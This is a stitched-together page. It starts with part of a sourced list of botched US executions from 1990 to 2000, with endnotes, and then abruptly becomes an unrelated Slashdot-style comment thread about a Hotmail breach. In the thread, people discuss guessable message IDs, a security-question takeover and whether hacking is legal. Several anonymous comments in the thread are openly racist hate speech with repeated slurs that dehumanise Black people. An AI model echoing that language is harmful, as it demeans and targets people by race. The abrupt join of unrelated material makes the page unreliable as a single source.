14. October 17, 1990. Virginia. Wilbert Lee Evans. Electrocution. When Evans was hit with the first burst of electricity, blood spewed from the right side of the mask on Evans's face, drenching Evans's shirt with blood and causing a sizzling sound as blood dripped from his lips. Evans continued to moan before a second jolt of electricity was applied. The autopsy concluded that Evans suffered a bloody nose after the voltage surge elevated his high blood pressure.20

15. August 22, 1991. Virginia. Derick Lynn Peterson. Electrocution. After the first cycle of electricity was applied, and again four minutes later, prison physician David Barnes inspected Peterson's neck and checked him with a stethoscope, announcing each time "He has not expired." Seven and one-half minutes after the first attempt to kill the inmate, a second cycle of electricity was applied. Prison officials later announced that in the future they would routinely administer two cycles before checking for a heartbeat.21

16. January 24, 1992. Arkansas. Rickey Ray Rector. Lethal Injection. It took medical staff more than 50 minutes to find a suitable vein in Rector's arm. Witnesses were kept behind a drawn curtain and not permitted to view this scene, but reported hearing Rector's eight loud moans throughout the process. During the ordeal Rector (who suffered from serious brain damage) helped the medical personnel find a vein. The administrator of State's Department of Corrections medical programs said (paraphrased by a newspaper reporter) "the moans did come as a team of two medical people that had grown to five worked on both sides of his body to find a vein." The administrator said "That may have contributed to his occasional outbursts." The difficulty in finding a suitable vein was later attributed to Rector's bulk and his regular use of antipsychotic medication.22

17. April 6, 1992. Arizona. Donald Eugene Harding. Asphyxiation. Death was not pronounced until 10 1/2 minutes after the cyanide tablets were dropped.23 During the execution, Harding thrashed and struggled violently against the restraining straps. A television journalist who witnessed the execution, Cameron Harper, said that Harding's spasms and jerks lasted 6 minutes and 37 seconds. "Obviously, this man was suffering. This was a violent death .. . an ugly event. We put animals to death more humanely."24 Another witness, newspaper reporter Carla McClain, said, "Harding's death was extremely violent. He was in great pain. I heard him gasp and moan. I saw his body turn from red to purple."25 One reporter who witnessed the execution suffered from insomnia and assorted illnesses for several weeks; two others were "walking vegetables" for several days.26

18. March 10, 1992. Oklahoma. Robyn Lee Parks. Lethal Injection. Parks had a violent reaction to the drugs used in the lethal injection. Two minutes after the drugs were dispensed, the muscles in his jaw, neck, and abdomen began to react spasmodically for approximately 45 seconds. Parks continued to gasp and violently gag until death came, some eleven minutes after the drugs were first administered. Tulsa World reporter Wayne Greene wrote that the execution looked "painful and ugly," and "scary." "It was overwhelming, stunning, disturbing -- an intrusion into a moment so personal that reporters, taught for years that intrusion is their business, had trouble looking each other in the eyes after it was over."27

19. April 23, 1992. Texas. Billy Wayne White. Lethal Injection. White was pronounced dead some 47 minutes after being strapped to the execution gurney. The delay was caused by difficulty finding a vein; White had a long history of heroin abuse. During the execution, White attempted to assist the authorities in finding a suitable vein.28

20. May 7, 1992. Texas. Justin Lee May. Lethal Injection. May had an unusually violent reaction to the lethal drugs. According to one reporter who witnessed the execution, May "gasped, coughed and reared against his heavy leather restraints, coughing once again before his body froze ..."29 Associated Press reporter Michael Graczyk wrote, "Compared to other recent executions in Texas, May's reaction was more violent. He went into a coughing spasm, groaned and gasped, lifted his head from the death chamber gurney and would have arched his back if he had not been belted down. After he stopped breathing, his eyes and mouth remained open."30

21. May 10, 1994. Illinois. John Wayne Gacy. Lethal Injection. After the execution began, the lethal chemicals unexpectedly solidified, clogging the IV tube that lead into Gacy's arm, and prohibiting any further passage. Blinds covering the window through which witnesses observed the execution were drawn, and the execution team replaced the clogged tube with a new one. Ten minutes later, the blinds were then reopened and the execution process resumed. It took 18 minutes to complete.31 Anesthesiologists blamed the problem on the inexperience of prison officials who were conducting the execution, saying that proper procedures taught in "IV 101" would have prevented the error.32

22. May 3, 1995. Missouri. Emmitt Foster. Lethal Injection. Seven minutes after the lethal chemicals began to flow into Foster's arm, the execution was halted when the chemicals stopped circulating. With Foster gasping and convulsing, the blinds were drawn so the witnesses could not view the scene. Death was pronounced thirty minutes after the execution began, and three minutes later the blinds were reopened so the witnesses could view the corpse.33 According to William "Mal" Gum, the Washington County Coroner who pronounced death, the problem was caused by the tightness of the leather straps that bound Foster to the execution gurney; it was so tight that the flow of chemicals into the veins was restricted. Foster did not die until several minutes after a prison worker finally loosened the straps. The coroner entered the death chamber twenty minutes after the execution began, diagnosed the problem, and told the officials to loosen the strap so the execution could proceed.34 In an editorial, the St. Louis Post-Dispatch called the execution "a particularly sordid chapter in Missouri's capital punishment experience."35

23. January 23, 1996. Virginia. Richard Townes, Jr. Lethal Injection. This execution was delayed for 22 minutes while medical personnel struggled to find a vein large enough for the needle. After unsuccessful attempts to insert the needle through the arms, the needle was finally inserted through the top of Mr. Townes's right foot.36

24. July 18, 1996. Indiana. Tommie J. Smith. Lethal Injection. Because of unusually small veins, it took one hour and nine minutes for Smith to be pronounced dead after the execution team began sticking needles into his body. For sixteen minutes, the execution team failed to find adequate veins, and then a physician was called.37 Smith was given a local anesthetic and the physician twice attempted to insert the tube in Smith's neck. When that failed, an angio-catheter was inserted in Smith's foot. Only then were witnesses permitted to view the process. The lethal drugs were finally injected into Smith 49 minutes after the first attempts, and it took another 20 minutes before death was pronounced.38

25. March 25, 1997. Florida. Pedro Medina. Electrocution. A crown of foot-high flames shot from the headpiece during the execution, filling the execution chamber with a stench of thick smoke and gagging the two dozen official witnesses. An official then threw a switch to manually cut off the power and prematurely end the two-minute cycle of 2,000 volts. Medina's chest continued to heave until the flames stopped and death came.39 After the execution, prison officials blamed the fire on a corroded copper screen in the headpiece of the electric chair, but two experts hired by the governor later concluded that the fire was caused by the improper application of a sponge (designed to conduct electricity) to Medina's head.

26. May 8, 1997. Oklahoma. Scott Dawn Carpenter. Carpenter was pronounced dead some 11 minutes after the lethal injection was administered. As the drugs took effect, Carpenter began to gasp and shake. "This was followed by a guttural sound, multiple spasms and gasping for air" until his body stopped moving, three minutes later.40

27. June 13, 1997. South Carolina. Michael Eugene Elkins. Lethal Injection. Because Elkins's body had become swollen from liver and spleen problems, it took nearly an hour to find a suitable vein for the insertion of the catheter. Elkins tried to assist the executioners, asking "Should I lean my head down a little bit?" as they probed for a vein. After numerous failures, a usable vein was finally found in Elkins's neck.41

28. April 23, 1998. Texas. Joseph Cannon. Lethal Injection. It took two attempts to complete the execution. After making his final statement, the execution process began. A vein in Cannon's arm collapsed and the needle popped out. Seeing this, Cannon lay back, closed his eyes, and exclaimed to the witnesses, "It's come undone." Officials then pulled a curtain to block the view of the witnesses, reopening it fifteen minutes later when a weeping Cannon made a second final statement and the execution process resumed.42

29. October 5, 1998. Nevada. Roderick Abeyta. It took 25 minutes for the execution team to find a vein suitable for the lethal injection.43

30. July 8, 1999. Florida. Allen Lee Davis. "Before he was pronounced dead ... the blood from his mouth had poured onto the collar of his white shirt, and the blood on his chest had spread to about the size of a dinner plate, even oozing through the buckle holes on the leather chest strap holding him to the chair."44 His execution was the first in Florida's new electric chair, built especially so it could accommodate a man Davis's size (approximately 350 pounds). Later, when another Florida death row inmate challenged the constitutionality of the electric chair, Florida Supreme Court Justice Leander Shaw commented that "the color photos of Davis depict a man who -- for all appearances -- was brutally tortured to death by the citizens of Florida."45 Justice Shaw also described the botched executions of Jesse Tafero and Pedro Medina (q.v.), calling the three executions "barbaric spectacles" and "acts more befitting a violent murderer than a civilized state."46 Justice Shaw included pictures of Davis's dead body in his opinion.47 The execution was witnessed by a Florida State Senator, Ginny Brown-Waite, who at first was "shocked" to see the blood, until she realized that the blood was forming the shape of a cross and that it was a message from God saying he supported the execution.48

31. June 8, 2000. Florida. Bennie Demps. It took execution technicians 33 minutes to find suitable veins for the execution. "They butchered me back there," said Demps in his final statement. "I was in a lot of pain. They cut me in the groin; they cut me in the leg. I was bleeding profusely. This is not an execution, it is murder." The executioners had no unusual problems finding one vein, but because Florida protocol requires a second alternate intravenous drip, they continued to work to insert another needle, finally abandoning the effort after their prolonged failures.49

32. June 28, 2000. Missouri. Bert Leroy Hunter. Hunter had an unusual reaction to the lethal drugs, repeatedly coughing and gasping for air before he lapsed into unconsciousness.50 An attorney who witnessed the execution reported that Hunter had "violent convulsions. His head and chest jerked rapidly upward as far as the gurney restraints would allow, and then he fell quickly down upon the gurney. His body convulsed back and forth like this repeatedly. ... He suffered a violent and agonizing death."51

Endnotes
1. Deborah W. Denno, Is Electrocution an Unconstitutional Method of Execution? The Engineering of Death over the Century, 35 WILLIAM & MARY L. REV. 551, 664-665 (1994).
2. For a description of the execution by Evans's defense attorney, see Russell F. Canan, Burning at the Wire: The Execution of John Evans, in FACING THE DEATH PENALTY: ESSAYS ON A CRUEL AND UNUSUAL PUNISHMENT 60 (Michael L. Radelet ed. 1989); see also Glass v. Louisiana, 471 U.S. 1080, 1091-92 (1985).
3. David Bruck, Decisions of Death, THE NEW REPUBLIC, Dec. 12, 1984, at 24-25.
4. Ivan Solotaroff, The Last Face You'll Ever See, 124 ESQUIRE 90, 95 (Aug. 1995).
5. Two Charges Needed to Electrocute Georgia Murderer, N.Y. TIMES, Dec. 13, 1984, at 12.
6. Editorial, N.Y. TIMES, Dec. 17, 1984, at 22.
7. Murderer of Three Women is Executed in Texas, N.Y. TIMES, March 14, 1985, at 9.
8. Killer's Electrocution Takes 17 Minutes in Indiana Chair, WASH. POST, Oct. 17, 1985, at A16.
9. Indiana Executes Inmate Who Slew Father-In-Law, N.Y. TIMES, Oct. 17, 1985, at 22.
10. Killer Lends A Hand to Find A Vein for Execution, L.A. TIMES, Aug. 20, 1986, at 2.
11. Addict Is Executed in Texas For Slaying of 2 in Robbery, N.Y. TIMES, June 25, 1987, at A24.
12. Drawn-out Execution Dismays Texas Inmates, DALLAS MORNING NEWS, Dec. 15, 1988, at 29A.
13. Landry Executed for '82 Robbery-Slaying, DALLAS MORNING NEWS, Dec. 13, 1988, at 29A.
14. Witness to an Execution, HOUS. CHRON., May 27, 1989, at 11.
15. John Archibald, On Second Try, Dunkins Executed for Murder, BIRMINGHAM NEWS, July 14, 1989, at 1.
16. Peter Applebome, 2 Jolts in Alabama Execution, N.Y. TIMES, July 15, 1989, at 6.
17. Cynthia Barnett, Tafero Meets Grisly Fate in Chair, GAINESVILLE SUN, May 5, 1990, at 1; Cynthia Barnett, A Sterile Scene Turns Grotesque, GAINESVILLE SUN, May 5, 1990, at 1; Bruce Ritchie, Flames, Smoke Mar Execution of Murderer, FLORIDA TIMES- UNION (Jacksonville), May 5, 1990, at 1; Bruce Ritchie, Report on Flawed Execution Cites Human Error, FLORIDA TIMES-UNION (Jacksonville), May 9, 1990, at B1.
18. Bill Moss, Chair Concerns Put Deaths on Hold, ST. PETERSBURG TIMES, July 18, 1990, at 1B.
19. Niles Group Questions Execution Procedure, UNITED PRESS INTERNATIONAL, Nov. 8, 1992 (LEXIS/NEXUS file).
20. Mike Allen, Groups Seek Probe of Electrocution's Unusual Events, RICHMOND TIMES-DISPATCH, Oct. 19, 1990, at B1; Mike Allen, Minister Says Execution Was Unusual, RICHMOND TIMES- DISPATCH, Oct. 20, 1990, at B1; DeNeen L. Brown, Execution Probe Sought, WASH. POST, Oct. 21, 1990, at D1.
21. Karen Haywood, Two Jolts Needed to Complete Execution, THE FREE-LANCE STAR (Fredericksburg, Vir.), Aug. 23, 1991, at 1; Death Penalty Opponents Angry About Latest Execution, RICHMOND TIMES-DISPATCH, Aug. 24, 1991, at 1; Virginia Alters its Procedure for Executions in Electric Chair, WASH. POST, Aug. 24, 1991, at B3.
22. Joe Farmer, Rector, 40, Executed for Officer's Slaying, ARKANSAS DEMOCRAT-GAZETTE, Jan. 25, 1992, at 1; Joe Farmer, Rector's Time Came, Painfully Late, ARKANSAS DEMOCRAT GAZETTE, Jan. 26, 1992, at 1B; Sonja Clinesmith, Moans Pierced Silence During Wait, ARKANSAS DEMOCRAT GAZETTE, Jan. 26, 1992, at 1B; Marshall Frady, Death in Arkansas, THE NEW YORKER, Feb. 22, 1993, at 105.
23. Gruesome Death in Gas Chamber Pushes Arizona Toward Injections, N.Y. TIMES, Apr. 25, 1992, at 9.
24. Charles L. Howe, Arizona Killer Dies in Gas Chamber, S.F. CHRON., Apr. 7, 1992, at A2.
25. Id.
26. Abraham Kwok, Injection: The No-Fuss Executioner, ARIZONA REPUBLIC, Feb. 28, 1993, at 1.
27. Wayne Greene, 11-Minute Execution Seemingly Took Forever, TULSA WORLD, Mar. 11, 1992, at A13.
28. Another U.S. Execution Amid Criticism Abroad, N.Y. TIMES, Apr. 24, 1992, at B7.
29. Robert Wernsman, Convicted Killer May Dies, ITEM (Huntsville, Tex.), May 7, 1992, at 1.
30. Michael Graczyk, Convicted Killer Gets Lethal Injection, HERALD (Denison, Tex.), May 8, 1992.
31. Scott Fornek and Alex Rodriguez, Gacy Lawyers Blast Method: Lethal Injections Under Fire After Equipment Malfunction, CHICAGO SUN-TIMES, May 11, 1994, at 5; Rich Chapman, Witnesses Describe Killer's 'Macabre' Final Few Minutes, CHICAGO SUN-TIMES, May 11, 1994, at 5.
32. Rob Karwath & Susan Kuczka, Gacy Execution Delay Blamed on Clogged IV Tube, CHICAGO TRIB., May 11, 1994, at 1 (Metro Lake Section).
33. Because they could not observe the entire execution procedure through the closed blinds, two witnesses later refused to sign the standard affidavit that stated they had witnessed the execution. Witnesses to a Botched Execution, ST. LOUIS POST- DISPATCH, May 8, 1995, at 6B.
34. Tim O'Neil, Too-Tight Strap Hampered Execution, ST. LOUIS POST-DISPATCH, May 5, 1995, at B1; Jim Slater, Execution Procedure Questioned, KANSAS CITY STAR, May 4, 1995, at C8.
35. Witnesses to a Botched Execution, ST. LOUIS POST-DISPATCH, May 8, 1995, at 6B.
36. Store Clerk's Killer Executed in Virginia, N.Y. TIMES, Jan. 25, 1996, at A19.
37. The involvement of this anonymous physician violated rules of both the American Medical Association and the Indiana State Medical Association. Sherri Edwards & Suzanne McBride, Doctor's Aid in Injection Violated Ethics Rule: Physician Helped Insert the Lethal Tube in a Breach of AMA's Policy Forbidding Active Role in Execution, INDIANAPOLIS STAR, July 19, 1996, at A1.
38. Id.; Suzanne McBride, Problem With Vein Delays Execution, INDIANAPOLIS NEWS, July 18, 1996, at 1.
39. Doug Martin, Flames Erupt from Killer's Headpiece, GAINESVILLE SUN, March 26, 1997, at 1. Medina was executed despite a life-long history of mental illness, and the Florida Supreme Court split 4-3 on whether to grant an evidentiary hearing because of serious questions about his guilt. This puts to rest any conceivable argument that Medina could have been guilty "beyond a reasonable doubt." Medina v. State, 690 So.2d 1241 (1997). The family of the victim had joined in a plea for executive clemency, in part because they believed Medina was innocent. Id., at 1252, n. 6. Even the Pope appealed for clemency. Martin, op. cit.
40. Michael Overall & Michael Smith, 22-Year-Old Killer Gets Early Execution, TULSA WORLD, May 8, 1997, at A1.
41. Killer Helps Officials Find A Vein At His Execution, CHATTANOOGA FREE PRESS, June 13, 1997, at A7.
42. Cannon was executed for a crime committed when he was 17 years old. 1st Try Fails to Execute Texas Death Row Inmate, ORLANDO SENT., Apr. 23, 1998, at A16; Michael Graczyk, Texas Executes Man Who Killed San Antonio Attorney at Age 17, AUSTIN AMERICAN-STATESMAN, Apr. 23, 1998, at B5.
43. Sean Whaley, Nevada Executes Killer, LAS VEGAS REVIEW- JOURNAL, Oct. 5, 1998, at 1A.
44. Davis Execution Gruesome, GAINESVILLE SUN, July 8, 1999, at 1A.
45. Provenzano v. State, 744 So.2d 413, 440 (Fla. 1999).
46. Id.
47. Id., at 442-44.
48. Mary Jo Melone, A Switch is Thrown, and God Speaks, ST. PETERSBURG TIMES, July 13, 1999, p. 1B.
49. Rick Bragg, Florida Inmate Claims Abuse in Execution, N.Y. TIMES, June 9, 2000, at A14; Phil Long & Steve Brousquet, Execution of Slayer Goes Wrong; Delay, Bitter Tirade Precede His Death, MIAMI HERALD, June 8, 2000.
50. David Scott, Convicted Killer Who Once Asked to Die is Executed, ASSOCIATED PRESS, June 28, 2000.
51. Letter from attorney Cheryl Rafert to Missouri Governor Mel Carnahan, June 30, 2000.

See also, Methods of Execution and Descriptions of Execution Methods

Re:hang 'em high

Let them niggers fry, i don't care.

George Bush is responsible for the death of more niggers than anyone else alive in America today. How many niggers did Al Gore kill? Zero. Gore didn't kill any niggers and he expects to be president? fuck no. You gotta fry some coons first before we can trust you to treat this fine land properly.

Re:Informative - More like criminal action actuall

[geekoid]

yes hacking is a criminal offence with jail terms
in fact, it is not a criminal offence.
I have legally hacked many systems. Now it may be a law to enter a system without permission, but thats not the same thing. There's also the arguement that a hotmail user does have a legal right to be on that system, so what it come down to is this "is it criminal to break a contract with a private company?" no, but you may be liable on a civil 'level'.

Is it still open?

[update()]

I'm not one of those people who starts gloating every time a Windows vulnerability appears, claiming it proves how awful Microsoft development is and how clearly inferior their products are to free alternatives. (How many holes in wu-ftpd do you need before that rings empty?)

But to me, the most astounding betrayal of computer security ever was Microsoft's conduct during the last Hotmail breach. Not that it happened (could happen to anyone) or even that they didn't pull the plug days until days after the exploit was made public but that they kept going for hours after everyone had the URL for the backdoor.

There was a great Salon article by a woman who heard about the breach on CNN, found the URL here and read her ex's new girlfriend's mail. I love the conclusion:

Late Monday, Microsoft continued to downplay the Hotmail hack in a statement published by Reuters: "We're hoping that because we jumped on it so quickly no one was affected."

Fat chance.

I wonder if this time will be different...

Re:Is it still open?

[Evil+MarNuke]

How many holes in wu-ftpd do you need before that rings empty?

I don't know. Let's look at sendmail. WOAH!! Every release since 2.0 but ONE had a security fix. Now lets take a poll. (If you are not a FI don't take this poll) Do you use sendmail?

100% No
0% Yes

Knowing that alot of people still use sendmail, we can conludes there are a lot of FI's and sendmail is a piece of crap, hey sorta like wu-ftpd!!

Re:Is it still open?

[DickBreath]

I'm not one of those people who starts gloating every time a Windows vulnerability appears, claiming it proves how awful Microsoft development is and how clearly inferior their products are to free alternatives.

Why not? I am.

Re:Is it still open?

[Malcontent]

Nobody uses sendmail or wu-ftpd anymore do they? Qmail, postfix, etc are pretty damned good. Proftpd is also pretty good.

More accurate analogy...

[warmenhoven]

"Cars are only dangerous if they can move."

Doesn't 'hacking' imply bypassing security?

[mgkimsal2]

Is it really 'hacking'? Hacking may be broadly defined, but it USUALLY implies willfully circumventing security measures. If Microsoft is NOT verifying any information in the GET string (comparing USERNAME against my session IDs username), I'd argue back they aren't implementing security - certainly not REASONABLE security.

Re:Doesn't 'hacking' imply bypassing security?

[CodeMonky]

But your GET string doesn't magically change to point at someone else's mailbox. That requires you to actually think about it and change it.

Re:Doesn't 'hacking' imply bypassing security?

[Jester998]

Agreed, but I think you're missing the point; this person is arguing that you're not actually "circumventing security measures", since there ARE NO SECURITY MEASURES. Doesn't make it right, necessarily, but it's not circumvention.

True, the message IDs *might* be considered "security", but I doubt most security analysts would agree.

Either way, it's definitely food for thought... we might need a whole new definition of "circumvention" or "security" to deal with cases like this.

- Jester

Re:Doesn't 'hacking' imply bypassing security?

[CodeMonky]

True, although by using this method one could argue you are circumventing the login/password of the user who's email you are reading. But I'm playing devils advocate there.

Whats more interesting is how long it is gonna take MS to fix this, and better yet how long this has been privately known by MS and possibly others.

Re:Doesn't 'hacking' imply bypassing security?

[jrockway]

The machine is out on the internet, and you can offer any request you want. If e-mail is so sacred, the servers should prevent you from looking at other people's mails. Not the request

Microsoft on a feature slide

The problem with Microsoft is that they simply can't stop adding features to their products. They desperately wants to enhance the "usability" and nice look of things. This works extremely well for luring new unenlightened sheep to use their products. But it is of course at the cost of lower security, since it is simply impossible to check everything when so much new stuff goes in...
Until Microsofts learn that "good looks" and having feature X isn't everything I guess we have to live with their unsecure products...

Re:Informative - More like criminal action actuall

[matthewn]

Hey blang: Go find yourself a dictionary, and then look up 'parody,' 'satire,' and 'caricature.' (A quick check of 'clearly' might be in order as well.) I don't think the post in question should be illegal, but it doesn't fall into any of the categories you've described.

Also, the 2600 case is not over yet.

Re:So what? (Humour, may offend but i doubt it)

[uchian]

Actually it's very easy, as long as you obey one simple rule:

Start soft...

Whoa, dude....

You just missed # 2,200,000 :)

Re:Informative - More like criminal action actuall

[iggly_iguana]

No, your not a lawyer, your an anonymous coward!

Who uses hotmail as their primary email anyway?

[uchian]

Oops - lot's of my friends do actually...

Hmm....

Nah, (dismisses it with a wave of his hand), I'm too nice...

hmm...

Oh GOD no!!!

[Nathdot]

I hope nobody views my very private "Cum Sluts 4 you, you Studly Horny Horndog" email from Jennifer397@hjklf.brf34.fgh3r

Somethings are just, you know, "personal"

:)

grits

grits is the shit.

110 Million Users?

[Nerftoe]

"security experts say Hotmail's 110 million users shouldn't worry too much."

Maybe that's because there are only 20 million hotmail users with many aliases. Who are they kidding? The reason why there are so many people with multiple usernames is because after a few weeks you will bombarded with "Hardcore Grandma F*cking" emails, and you must move on to a different address. Seriously though, I signed up Hotmail accounts twice, never used them, and they were getting 10+ spam messages after several weeks.

damn cracka's

they think they such hot shit

niggers smell like shit

niggers are fucking disgusting.

H1, H0W 4R3 Y0U?

[pdiaz]

1 53nd y0u th15 m41l 1n 0rd3r t0 0wn y0ur h0m41il
4cc0unt!

(I just could'n resist :-)

Re:H1, H0W 4R3 Y0U?

(I just could'n resist :-)
Please try next time.
Thanks,

why

why didn't those lazy slave owners just leave those fucking prehuman chimps in the jungle where they belong. Fucking americas all fucked up now.

How my friend had his hotmail acct hacked...

[garagekubrick]

His girlfriend knows all his information, like zip code and location, so she clicks on forgot my password. Having passed that, his security question was: "What's my sister's name?" That wasn't too hard.

Needless to say, once she got in and had a look at his e lover's correspondence, the four year relationship ended quickly.

Re:How my friend had his hotmail acct hacked...

[archen]

actually, that's why I always lie to answers of questions like that. Typically I have a smart ass answer that i would probably only think of.

Re:How my friend had his hotmail acct hacked...

[soulsteal]

Typically I have a smart ass answer that I would probably only think of.

Kind of like answering "Yes, with butter and ambrosia sauce" when asked if you like children.

Re:How my friend had his hotmail acct hacked...

[kin_korn_karn]

if she was that insecure and untrusting he didn't need her anyway.

Guess work?

[frleong]

Since the messageid requires guessing, wouldn't it be easier to guess the password of the targeted user directly?

Good, the more the better

[Hobobo]

If Hotmail and passport sites are constantly hacked/cracked, people will have less and less trust in Microsoft.

And besides, I don't have anything but spam in my mailbox :).

feh

If i lived in a nice white neighborhood off in the suburbs where you don't have to put bars on your first floor windows to keep the niggers out, well i would probably claim to love niggers to. But when you have to deal with these beasts on a daily basis you realize they are just dispicable. It's easy to say you love niggers when you live off with a bunch of white fucks and don't have to worry about some niggers trying to rob you for your watch. Every white neighborhood has at leats one or two oreo nigger families, but they aren't real. Go live in a place that is fucking filled with niggers and see how much crime and drugs they are involved in. I wish i could live in some white community and sit around outside in a nice backyard and pool and no graffitti or drug dealers and talk about how much i love "african americans" ya fuck you.

Re:feh

What does this have to do with hotmail?

Re:feh

[JohnnyBolla]

Why is it that none of you Nazi fucks can spell?

RE: Hotmail hacked!

[zorknorobot]

Scary. I have a hotmail account, and I have more of my personal messages sent there. I guess it just shows you how you can't trust any security no matter how good it may look on the surface.

Re:Informative - More like criminal action actuall

[donutello]

YES I AM A LAWYER

Any smart lawyer would know a lot better than to provide unsolicited opinions on legal matters in a public forum. (Yes, it is possible to trace Anonymous Cowards through their IPs, etc). Now go back to your cave, troll.

Re:Informative - More like criminal action actuall

"This suit [findlaw.com]"

Hot damn! Cool new feature. I guess to fend off any of the goatse trolling and whatnot. Sweet.

URL boxes

[boysimple]

where did they come from...

Photos of your mom

Kinda opens up a new level of humor...

Re:Informative - More like criminal action NOT

so if you broke into Fort Knox, you were only doing your bit, trying to help expose the vulnerability to help them. yeah.

you are one stupid dumbass, mr

All my important email!

[MyMarty]

Damn. They've got access to a whole bunch of spam... Luckily enough they'll be able to get a few credit cards (through another of the junk emails) to get into the site.

Motion for Summary Judgment

[CoachS]

Actually, the owners of Slashdot.org don't do the moderating -- the users do. Furthermore the actual users doing the moderating rotates fairly constantly; could be me tomorrow, could be you the day after that.

A smart lawyer, of which I could be one, would quickly dispatch the "promoting a felony" argument by pointing out that none of the promoting was done by the hypothetical defendants in this matter. Any promoting or highlighting of the "offensive" subject matter, like the posting itself as a matter of fact, was done by pseudo-anonymous members of the community at large.

It could be argued, I suppose, that Slashdot.org has created a forum that fosters or even encourages(?) such offenses, but that argument has fallen flat in a number of cases already decided.

Precedent being what it is I don't think Taco and friends should be speed-dialing Johnnie Cochran just yet.

-Coach-

Speaking of pretty disclaimers...I am not your lawyer and this is not legal advice, merely my educated opinion. If you wish legal advice seek out an attorney licensed to practice the kind of law you need in your area and pay them for it.

Re:Informative - More like criminal action actuall

it's known as being a "common carrier". That is, an information relayer who cannot or should not have to monitor content.

Telecoms companies and postal services are considered such. *Some* online services are too. Contradictory rulings have been issued time and time again, so there's no final word on it (though anyone in their right mind knows that AOL can't monitor packets to check for DeCSS for instance...)

Experts, eh?

[sootman]

From the article: "...intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Let's dissect this one, shall we?

"intruders would first need to log in to their own Hotmail accounts" right, no cracker would be bright enough to create a new one just for this purpose, duh...

"which means they'd leave a clear trail for investigators to follow" Yup, they'd follow it all the way to a public library.

Otherwise, entertaining piece.

redefine rehash redofromstart

hehe where has the slashdotian lexical revisionist spirit gone? no one has complained that the title didn't read "cracked" ?? hehe :)

Re:redefine rehash redofromstart

I used the word cracker when posting it thats good enough

Stop whining about this.

[Lonath]

Look, so some free email site got hacked. Big deal. It isn't like this is some huge central database with all of the private financial and personal information for everyone on the internet. And I know whoever's running this "hotmail" site isn't stupid enough to try to set up such a database since it would be such a massive target for crackers and screw over so many customer, so what's the big deal?

questions questions, and more questions

[_avs_007]

Yeah, but we'll never know... On the US Treasury homepage, it says that money says money is "Legal Tender for all debts, public and private"...

Then it goes on to say that Federal law does not say that somebody must accept cash for a debt... However, if you look in any dictionary, "Legal Tender", is defined as something that must be accepted when offered. So, then doesn't that blow a hole in the US Treasury's idea, of what it thinks is law? If so, then great..... Now I can make merchants accept cash, instead of "requiring a credit card"....

Re:questions questions, and more questions

Well, you are not in 'debt' until you have entered into a contract with someone. Ask your credit card company -- they probably won't want to admit it, but must accept cash as payment.

Re:Informative - More like criminal action actuall

[q-soe]

Actually this ruling does not apply to slashdot (it hasnt been tested) the ruling covers communications carriers who cannot be held responsible for the information carried on their medium - be it phone etc - AOL is an ISP and as such fall under this defenition - this ruling protects ISP's from being held responsible for the actions of their users - its a valid and important point - Slashdot can claim protection under this status but it would have to be proven in a court of law - the proscution would attempt to prove that slashdot knowingly allows the information on this and other examples to be posted (disclaimer aside) and this forum is often host to people who advocate hacking and mail bombming and DOS etc as action against companies and individuals - the user posted this under a username as ws his right - but /. cannot claim he is an anymous user and unable to be blocked etc.

note im not commenting on the right or wrong of it - i agree the post may be foolish but thats not my opinion to state - i just disagree with the statement that this ruling covers /. as a common carrier.

TechTV's "experts"

[dstone]

Gotta love the "experts" that TechTV talks to... From the article: In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said.

Uh, yeah, more like "intruders would first need to log in to a new, free, anonymous Hotmail account". Not much of a deterrent!

Change your hotmail password....end a relationship

[oncee]

That's how I knew my last relationship was over: when she changed her password to her e-mail account.

email is inherently insecure, unless...

[Rufus+T.+Firefly]

You get off your fat lazy asses and use encryption.

Here's my SSN, if anyone's interested:

-----BEGIN PGP MESSAGE-----

qANQR1DBwU4DlqED0wdUwQkQCADXxCLpw7M5WBka374Xt7VfhF 2GDiXem2qTrxr+
O671tUTFvUVD534Na2sq6macNcOVw51WJmxPwFsYrvUriFEAHj da9iyKjfTq9Eav
pLTMzkW3L5nXLn2ZfyUZl2sjzV4wayjbomDPklSOOVB6Vhlqpv m+VT0gPaB76mL0
qy2GHDt+7qUfIzxhNJzCGxiEtzzVJ7ZwyGSK1pk6inF17ty1qI LSEofJz7+DOGVu
gw2clFq6ukexmtIMfkkoxMoRJhds30AOELnU0VnFsm1uowysCn qrZfMyphio1vsr
g+Vwh3p7ytU5RKm2uifMGT9ZozxM00sgpWdzneGc7fKhCQGPB/ 4rK0SxAw7C0CTR
hdsvzPXKWPA/KkjSHnhDiR4xroUvX7E9LA6gRpPNnsUSjFgezD 5ca1sogYBUoqeR
kwdqB46LfnVr9TxWen4hKYsaH0nBHV0yROL8pbpOiR2FlCC5NV QyTZJyv32cLQrt
uVwAXfjnm71aUUuVFlTCVW3zqAOApK3fLO1ONt14WzdSjrUKU9 EExEKm++YHP7+D
mgjCj5v6zSFUqbpLsPf7Ix6duEbjYKVJFEgkKm4tCK9ID+H9GO dXQeUNw4x4aSNE
9iXrAZeFNTb9hcHgMzBq97uDK3tutKQI73wSLGW/gICbztpS2n a7JegWs6hBCqWG
g5VDJ6ElySVnlNQ2lpIPSaMLE9bAgcxC1w60LphwlTlrQF2DYi btRG8gbILm
=iDVa
-----END PGP MESSAGE-----

;-)

Admiral Yamamoto

Your friend learned a valuable lesson...

[No+Such+Agency]

... or two.

1. The person cracking/social-engineering into your e-mail account will more than likely be somebody who you already know. So don't use widely-known personal info as a password reminder!

2. If you cheat on your S.O., you WILL get caught. This is especially true if you're a man or a lesbian - women seem to be natural Sherlock Holmeses. And yes, "e-lovers" count as cheating.

Come on...

[blair1q]

Okay. If this isn't a hoax, then why hasn't anyone posted the contents of billgates@hotmail.com yet?

--Blair

Re:Come on...

Okay. If this isn't a hoax, then why hasn't anyone posted the contents of billgates@hotmail.com yet?

--Blair

If you actually read the article you would know the answer to this question!

Re:Come on...

[blair1q]

No, I wouldn't, because it didn't say anything about anything I asked about.

--Blair
"Keep it unreal."

Re:Come on...

[Zero__Kelvin]

It states quite explicitly that you have to guess the correct message number. The likelihood of guessing the right number(s) related to Bill Gates is close to zero. Besides, do you really think Gates uses hotmail? Surely you aren't stopping to think here.

Re:Come on...

[blair1q]

Ah. I see. You

1. Don't understand humor.

2. Don't understand the tenacity of h4xx0rs.

(1) applies to the concept "if Bill Gates uses HotMail," which was implicit in my post; and (2) applies to the concept "then surely some one of the thousands of underutilized teenage typing resources infesting the internet would have found one of Bill Gates' messages and posted it by now."

